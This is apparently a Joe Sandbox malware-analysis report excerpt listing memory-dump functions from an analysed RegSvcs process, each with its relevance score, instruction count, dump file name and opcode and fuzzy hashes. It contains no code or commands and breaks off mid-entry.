                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 659db1079e9393cfea0e571ee3a94909e886859a40bb07c5da498b585dc708ad
                                                                                    • Instruction ID: da030f693440b8dcad7344b9ee6c4487f5c8a27abbbf2936bf2eedc22721553d
                                                                                    • Opcode Fuzzy Hash: 659db1079e9393cfea0e571ee3a94909e886859a40bb07c5da498b585dc708ad
                                                                                    • Instruction Fuzzy Hash: D7C1E674E00218CFDB54DFA5C994B9DBBB2BF89300F2481AAD409AB395DB359E85CF50
                                                                                    Function 004C3740 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bbbabaf1fd9f64adaab733e81ad475aa3c0591cb88e2a32a26d84ae3b7fb2a25
                                                                                    • Instruction ID: 44c0d03a351401648566cb1c87f6003caeb1c3c9adb1be75ffb924050360cbe7
                                                                                    • Opcode Fuzzy Hash: bbbabaf1fd9f64adaab733e81ad475aa3c0591cb88e2a32a26d84ae3b7fb2a25
                                                                                    • Instruction Fuzzy Hash: 29C1C574E00218CFDB54DFA5C994BADBBB2BF89301F2080AAD409AB395DB355E85CF54
                                                                                    Function 004C5150 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e61fcef30df77679dadce6976c11e97ac94e28955c9459025b355f94163dff0b
                                                                                    • Instruction ID: 6fe85ee9c28ad0591c0b0dce46926d9899dad3b82f2d4fef17fae22718a24d09
                                                                                    • Opcode Fuzzy Hash: e61fcef30df77679dadce6976c11e97ac94e28955c9459025b355f94163dff0b
                                                                                    • Instruction Fuzzy Hash: 4CC1D574E00218CFDB54DFA5C994B9DBBB2BF89300F6080AAD409AB3A5DB355E85CF50
                                                                                    Function 004C9468 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3bd152cdadf6a2c6c220be4a96bcd272e52fc419c013eb57f5c1ba438a5a3a8d
                                                                                    • Instruction ID: 9af2ed84db48d9c5f6ce55b962b3a67ab1da6148be3d7deac918b426cfc24760
                                                                                    • Opcode Fuzzy Hash: 3bd152cdadf6a2c6c220be4a96bcd272e52fc419c013eb57f5c1ba438a5a3a8d
                                                                                    • Instruction Fuzzy Hash: D3C1C474E00218CFDB54DFA5C994BADBBB2BF89300F2080AAD409AB395DB355E85CF54
                                                                                    Function 004C0778 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 658909bd5c382d0fd4e49efec41755b6e10b6eff487e067afbf028dee243701d
                                                                                    • Instruction ID: 0b41d2ecfdd61f91080f990647f5baae78f10e67a123f2a494fffa928099c049
                                                                                    • Opcode Fuzzy Hash: 658909bd5c382d0fd4e49efec41755b6e10b6eff487e067afbf028dee243701d
                                                                                    • Instruction Fuzzy Hash: C9C1D574E00218CFDB54DFA5C994B9DBBB2BF89300F2084AAD409AB395DB355E85CF54
                                                                                    Function 004CB778 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ff617f4f55480d71d2c68e2dcfc12ad55c0e0bca42baf881caeb512be7305fd4
                                                                                    • Instruction ID: 0afc62a09e9a5ca9ac6fd984960f19468ce795ab8392912649730c1bc8be9ddf
                                                                                    • Opcode Fuzzy Hash: ff617f4f55480d71d2c68e2dcfc12ad55c0e0bca42baf881caeb512be7305fd4
                                                                                    • Instruction Fuzzy Hash: 1EC1A274E00218CFDB54DFA5C995BADBBB2BF89300F2080AAD409AB395DB355E85CF54
                                                                                    Function 004C5A00 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a3ea0199a4ab011ff6bbbad3ffcfa7c1d521803e62831a53c5da3ae82e6b3344
                                                                                    • Instruction ID: feaf58f1757f277627c71986ed68ae6aac765864354dce854da9f4e19b8358f0
                                                                                    • Opcode Fuzzy Hash: a3ea0199a4ab011ff6bbbad3ffcfa7c1d521803e62831a53c5da3ae82e6b3344
                                                                                    • Instruction Fuzzy Hash: 04C1C574E00218CFDB54DFA5C994BADBBB2BF89300F2080AAD409AB395DB355E85CF50
                                                                                    Function 004CC028 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a80a9e35d6e7dec190acda220ccacdac6982c0452b9bccd363c8aff813eef28c
                                                                                    • Instruction ID: 8d24b035c63bb8fedf66b5fa0e1b5dcd41e6a4032d1ddf2090cd1dc48cff35ae
                                                                                    • Opcode Fuzzy Hash: a80a9e35d6e7dec190acda220ccacdac6982c0452b9bccd363c8aff813eef28c
                                                                                    • Instruction Fuzzy Hash: 20C1D674E00218CFDB54DFA5C994BADBBB2BF89300F2480AAD409AB395DB355E85CF54
                                                                                    Function 004C1028 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 39c13fa2d1503eef952c690d1d3a38d9caeff09ab70e3604dd4d7b85a9896a7c
                                                                                    • Instruction ID: 347464ae83febd78ff559b90ac3ecb163ed8ace82298eab444df559078b45018
                                                                                    • Opcode Fuzzy Hash: 39c13fa2d1503eef952c690d1d3a38d9caeff09ab70e3604dd4d7b85a9896a7c
                                                                                    • Instruction Fuzzy Hash: 54C1D778E00218CFDB54DFA5C994B9DBBB2BF89300F6080AAD409AB365DB355E85CF54
                                                                                    Function 004C0320 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bc5f22addd978ca52c18aed0c92db185af24ceb798ca90e2f13bcd6474b0043b
                                                                                    • Instruction ID: dd3173a4c99a6c1dfa0cc9ebb89e308fefbbb0fb9dbb4ee5b9b3ddcc8001cac7
                                                                                    • Opcode Fuzzy Hash: bc5f22addd978ca52c18aed0c92db185af24ceb798ca90e2f13bcd6474b0043b
                                                                                    • Instruction Fuzzy Hash: 35C1C678E00218CFDB54DFA5C994B9DBBB2BF89300F2084AAD409AB395DB355E85CF54
                                                                                    Function 004CB320 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aeef1b2c5f8d9e99b989e8be247ca108146a76946c782147f5e9c767626aabb5
                                                                                    • Instruction ID: 9f96f17b0cfc279a280c9942e9f02a3ec92161a4146af1c860840dc687537ec7
                                                                                    • Opcode Fuzzy Hash: aeef1b2c5f8d9e99b989e8be247ca108146a76946c782147f5e9c767626aabb5
                                                                                    • Instruction Fuzzy Hash: 0BC1C578E00218CFDB54DFA5C995BADBBB2BF89300F2080AAD409AB355DB355E85CF50
                                                                                    Function 004C2A38 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 63148f568cdd397a15ce2c8a90d5a005d689f08fa636a18eef284ca57088aa25
                                                                                    • Instruction ID: 36f8ccf621fdf10b763c14ebff02a711e784b484350e21bc6ed0d11a85acd596
                                                                                    • Opcode Fuzzy Hash: 63148f568cdd397a15ce2c8a90d5a005d689f08fa636a18eef284ca57088aa25
                                                                                    • Instruction Fuzzy Hash: 24C1C678E00218CFDB54DFA5C994B9DBBB2BF89300F2080AAD409AB395DB755E85CF50
                                                                                    Function 004C1D30 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2c462f95cd26f40ea5f1d7c8e62e78f4163d30c7af57517fc57b388f9eba11bd
                                                                                    • Instruction ID: f585f2764365db12f9c96ac6911b107837ed46cdd7e960ec0c440b3dd80a071e
                                                                                    • Opcode Fuzzy Hash: 2c462f95cd26f40ea5f1d7c8e62e78f4163d30c7af57517fc57b388f9eba11bd
                                                                                    • Instruction Fuzzy Hash: 8DC1D674E00218CFDB54DFA5C994B9DBBB2BF89300F2480AAD409AB3A5DB355E85CF50
                                                                                    Function 004C18D8 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 17e21ff22600d4b810ec92a1aedf62fa55e23728b8c9800d7f508918fd5c66cf
                                                                                    • Instruction ID: e4980832757d227d83b571e21469f333542c7af71f88c1fcc0881ae99c5e637a
                                                                                    • Opcode Fuzzy Hash: 17e21ff22600d4b810ec92a1aedf62fa55e23728b8c9800d7f508918fd5c66cf
                                                                                    • Instruction Fuzzy Hash: B1C1C674E00218CFDB54DFA5C994B9DBBB2BF89300F2080AAD409AB3A5DB355E85CF50
                                                                                    Function 004C0BD0 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3b39af0e28e41e282155e54064cd2344116c32217b57a6ebd47858e770e43261
                                                                                    • Instruction ID: e316ce7d538e2c368e580b208f44b23357085cfb842a429b9991d2a2456504bf
                                                                                    • Opcode Fuzzy Hash: 3b39af0e28e41e282155e54064cd2344116c32217b57a6ebd47858e770e43261
                                                                                    • Instruction Fuzzy Hash: 76C1C478E00218CFDB54DFA5C994B9DBBB2BF89300F2084AAD409AB395DB355E85CF50
                                                                                    Function 004CBBD0 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ee4956d85b2d6b623946461592634fe2a7964ea04cd3a76b5418f201fb120ddb
                                                                                    • Instruction ID: e4681c9f7f75cddbf7ca8eac04dcc5cfd6825a4cb113e9dab6f1e2672302b781
                                                                                    • Opcode Fuzzy Hash: ee4956d85b2d6b623946461592634fe2a7964ea04cd3a76b5418f201fb120ddb
                                                                                    • Instruction Fuzzy Hash: CCC1B278E00218CFDB54DFA5C995B9DBBB2BF89300F2080AAD409AB395DB355E85CF50
                                                                                    Function 004C98E8 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8b1735a0fe434b34783c61e601d7e16b7f042f633af291e58e9c2d1cb928fe3b
                                                                                    • Instruction ID: a74dba73e58e89d3901ad98dde691774cf4b2e73f5f5ed06a0b36791cde915d9
                                                                                    • Opcode Fuzzy Hash: 8b1735a0fe434b34783c61e601d7e16b7f042f633af291e58e9c2d1cb928fe3b
                                                                                    • Instruction Fuzzy Hash: C6C1D578E00218CFDB54DFA5C994B9DBBB2BF89300F2081AAD409AB395DB355E85CF50
                                                                                    Function 004C32E8 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2511586be953a3ab8829099fc3e6a0831509719a0884ea04dd462bcfe793f9a0
                                                                                    • Instruction ID: 55755c39f6b62c14aaff714bf765678e8a40b8adc34921dd14777fa105b958e6
                                                                                    • Opcode Fuzzy Hash: 2511586be953a3ab8829099fc3e6a0831509719a0884ea04dd462bcfe793f9a0
                                                                                    • Instruction Fuzzy Hash: 94C1D474E00218CFDB54DFA5C994B9DBBB2BF89301F6080AAD409AB3A5DB355E85CF50
                                                                                    Function 004C4CF8 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2a2468249991e1b34c055693b8a7a0f671b8ecc754a1b6dc932a0dabfcb69ad8
                                                                                    • Instruction ID: b7ab77a575762cb015bb8d21a2d59ad996459397088c52c2199b4a47c3b424e5
                                                                                    • Opcode Fuzzy Hash: 2a2468249991e1b34c055693b8a7a0f671b8ecc754a1b6dc932a0dabfcb69ad8
                                                                                    • Instruction Fuzzy Hash: CEC1C574E00218CFDB54DFA5C994B9DBBB2BF89300F2480AAD409AB395DB355E85CF54
                                                                                    Function 004CA5F0 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8349c02913f1837af50f30b84d2c47804ad7c959772074e43d68fb6143f74732
                                                                                    • Instruction ID: 27f0314470c291662f42e1f238ea16e7bc87c825d2c27001a6b7ef2ef4ecd9d7
                                                                                    • Opcode Fuzzy Hash: 8349c02913f1837af50f30b84d2c47804ad7c959772074e43d68fb6143f74732
                                                                                    • Instruction Fuzzy Hash: 42C1D578E00218CFDB54DFA5C994B9DBBB2BF89304F2084AAD409AB395DB355E85CF50
                                                                                    Function 004C3FF0 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7c3a3e50dc6580ca05d7349b8da9b0458fc9247f07372307903c30f2e566251b
                                                                                    • Instruction ID: f27230d9ea938cb862f3b5c1a8c2ae9e06f5da6845ee534093f66b3a1bf5a5d7
                                                                                    • Opcode Fuzzy Hash: 7c3a3e50dc6580ca05d7349b8da9b0458fc9247f07372307903c30f2e566251b
                                                                                    • Instruction Fuzzy Hash: E5C1C674E00218CFDB54DFA5C994B9DBBB2BF89300F2480AAD409AB355DB355E85CF54
                                                                                    Function 004C2188 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 34827dc3f8beade2c933a36b143a0fa9bbaec91ced1ade5ad627cf60d8d177af
                                                                                    • Instruction ID: 5552179016c41114c79dea3573ee6fd69cd5d2ebf8a7a5bdf496d72964a5cde1
                                                                                    • Opcode Fuzzy Hash: 34827dc3f8beade2c933a36b143a0fa9bbaec91ced1ade5ad627cf60d8d177af
                                                                                    • Instruction Fuzzy Hash: 80C1D774E00218CFDB54DFA5C994B9DBBB2BF89300F2080AAD409AB395DB755E85CF54
                                                                                    Function 004C1480 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4ef40f3235d0e62b15614d235a2307ad3a01bf3e9a6c0dd5cb6a07edfbd2f6a1
                                                                                    • Instruction ID: 2702ba969fcae00d762a2efb77561fad80e4a88e8ad1d0e86f947f5773409ccf
                                                                                    • Opcode Fuzzy Hash: 4ef40f3235d0e62b15614d235a2307ad3a01bf3e9a6c0dd5cb6a07edfbd2f6a1
                                                                                    • Instruction Fuzzy Hash: 4BC1D574E00218CFDB54DFA5C994B9DBBB2BF89300F2484AAD409AB3A5DB355E85CF50
                                                                                    Function 004CA198 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7ae2a5371ddd666e996c009bce8586e19faa45a431cfdb64c8b687dde75c7ea3
                                                                                    • Instruction ID: daa0685623b297445de3d9afe6eda08b6e50b143813a4ed91b81f76357b74e02
                                                                                    • Opcode Fuzzy Hash: 7ae2a5371ddd666e996c009bce8586e19faa45a431cfdb64c8b687dde75c7ea3
                                                                                    • Instruction Fuzzy Hash: 9EC1D674E00218CFDB54DFA5C994B9DBBB2BF89304F2084AAD409AB395DB355E85CF50
                                                                                    Function 004C3B98 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a01e137d0f65545a143569c69a18c855714d24174c31fc04073c187ff21c584e
                                                                                    • Instruction ID: d8156958988413430673d878cfb335c5dc689fe9a0dd3896ba47ad33674474ed
                                                                                    • Opcode Fuzzy Hash: a01e137d0f65545a143569c69a18c855714d24174c31fc04073c187ff21c584e
                                                                                    • Instruction Fuzzy Hash: FDC1D474E00218CFDB54DFA5C994BADBBB2BF89301F2084AAD409AB395DB355E85CF50
                                                                                    Function 004C2E90 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1ef3926e87ccd916c8a522bb0f252704a555d8ed90df0126af5664783bea2fbe
                                                                                    • Instruction ID: 1bd2ab78450d440cc9c9fd447724cdc1c968060c63cf983411d4a6ef06598527
                                                                                    • Opcode Fuzzy Hash: 1ef3926e87ccd916c8a522bb0f252704a555d8ed90df0126af5664783bea2fbe
                                                                                    • Instruction Fuzzy Hash: 22C1D578E00218CFDB54DFA5C994B9DBBB2BF89301F2080AAD409AB395DB355E85CF50
                                                                                    Function 004C55A8 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fcbee5b85229c7d5ab363d823512fc00703e86692c34c231af6104ddb44cd572
                                                                                    • Instruction ID: 69dcc20c07abc9cff5f71569d87fd63335d52b3b4d0f6f602cfc6221fb8aac57
                                                                                    • Opcode Fuzzy Hash: fcbee5b85229c7d5ab363d823512fc00703e86692c34c231af6104ddb44cd572
                                                                                    • Instruction Fuzzy Hash: 35C1B478E00218CFDB54DFA5C994B9DBBB2BF89301F6080AAD409AB395DB355E85CF50
                                                                                    Function 004C48A0 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9ff7200ef5bd88f743ce47216298d03842f0c6531ad7207ad7c9504cf54c7f7f
                                                                                    • Instruction ID: e329a742f1cd6ac072d7fc7a1755b14d142ee5e581111970c964f9516a83036b
                                                                                    • Opcode Fuzzy Hash: 9ff7200ef5bd88f743ce47216298d03842f0c6531ad7207ad7c9504cf54c7f7f
                                                                                    • Instruction Fuzzy Hash: A8C1C774E00218CFDB54DFA5C994B9DBBB2BF89300F2480AAD409AB395DB355E85CF54
                                                                                    Function 004CAEA0 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ee171b5ae32795ef960aa093e1434da8c70196c5a91e7fdf789c588c9cd6ba0e
                                                                                    • Instruction ID: 3f08e699aeb3787622651d2f8615d52f872a06224a9f69f89d4c98b8da4db549
                                                                                    • Opcode Fuzzy Hash: ee171b5ae32795ef960aa093e1434da8c70196c5a91e7fdf789c588c9cd6ba0e
                                                                                    • Instruction Fuzzy Hash: B1C1C374E00218CFDB54DFA5C995B9DBBB2BF89300F2080AAD409AB395DB355E85CF50
                                                                                    Function 004C7698 Relevance: .2, Instructions: 222COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0e979ea7552b3904a9b8767fe3082fa5d89b9d61b55377addad04beb72966402
                                                                                    • Instruction ID: e60254143bf0ffff89451f7c166a3eb56f9f5e4c9a79576d8ccdd0f82c97a204
                                                                                    • Opcode Fuzzy Hash: 0e979ea7552b3904a9b8767fe3082fa5d89b9d61b55377addad04beb72966402
                                                                                    • Instruction Fuzzy Hash: 55B18A74E00218CFDB54DFA9D894A9DBBB2FF89310F2481A9D819A7365DB30AD45CF50
                                                                                    Function 003C566A Relevance: .2, Instructions: 193COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
